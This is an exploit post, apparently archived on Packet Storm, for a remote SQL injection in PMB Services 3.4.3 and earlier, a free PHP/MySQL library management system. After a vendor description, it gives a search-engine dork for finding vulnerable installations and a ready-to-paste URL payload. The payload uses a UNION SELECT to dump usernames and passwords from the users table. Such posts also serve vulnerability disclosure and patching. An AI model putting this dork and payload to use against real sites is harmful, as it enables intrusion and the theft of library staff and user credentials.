what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PMB Services 3.4.3 SQL Injection

PMB Services 3.4.3 SQL Injection
Posted Feb 1, 2011
Authored by Luchador

PMB Services versions 3.4.3 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 9ea8d46b4f16215aa7128c86c2942a6dc2c9c4dbb2b5bf4920af12ad32a681b0

PMB Services 3.4.3 SQL Injection

Change Mirror Download
888                       888                    888                 
888 888 888
888 888 888
888 888 888 .d8888b 88888b. 8888b. .d88888 .d88b. 888d888
888 888 888 d88P" 888 "88b "88b d88" 888 d88""88b 888P"
888 888 888 888 888 888 .d888888 888 888 888 888 888
888 Y88b 888 Y88b. 888 888 888 888 Y88b 888 Y88..88P 888
88888888 "Y88888 "Y8888P 888 888 "Y888888 "Y88888 "Y88P" 888


----------------------------------------------------------------------------
# Exploit Title: [ PMB Services <= 3.4.3 Remote SQL Injection ]
#Author : Luchador
#Date : 29-01-2011
#Location : Algeria
#Site : http://vbspiders.com
#Critical Lvl : Dangerous
#Mail: nourie.tlm[at]gmail.com
----------------------------------------------------------------------------
#Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : PMB Services
version : <= 3.4.3
Vendor : http://www.pmbservices.fr
Download : http://www.pmbservices.fr/download/index.php

Description :

PMB is a completely free ILS (Integrated Library management System).
The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.

PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.

The main functions of PMB are :

* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...
----------------------------------------------------------------------------
#Vulnerability:
~~~~~~~~~~~~
- Remote SQL Injection
#dork : inurl:opac_css or inurl:index.php?lvl=coll_see&id=
#Exploit:
~~~~~~~~
http://www.target.com[path pmb]/index.php?lvl=coll_see&id=-1/**/union/**/select+1,2,3,unhex(hex(group_CONCAT(username,0x3a,pwd))),5,6,7+from+users--


# Greetz : VoLc4n0,Q2-FOX2R
----------------------------------------------------------------------------
#Author : Luchador
#Date : 29-01-2011
#Location : Algeria
#Site : http://vbspiders.com
#Critical Lvl : Dangerous
#Mail: nourie.tlm[at]gmail.com
--------------------- Hack To Learn, Learn To Hack----------------------------

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close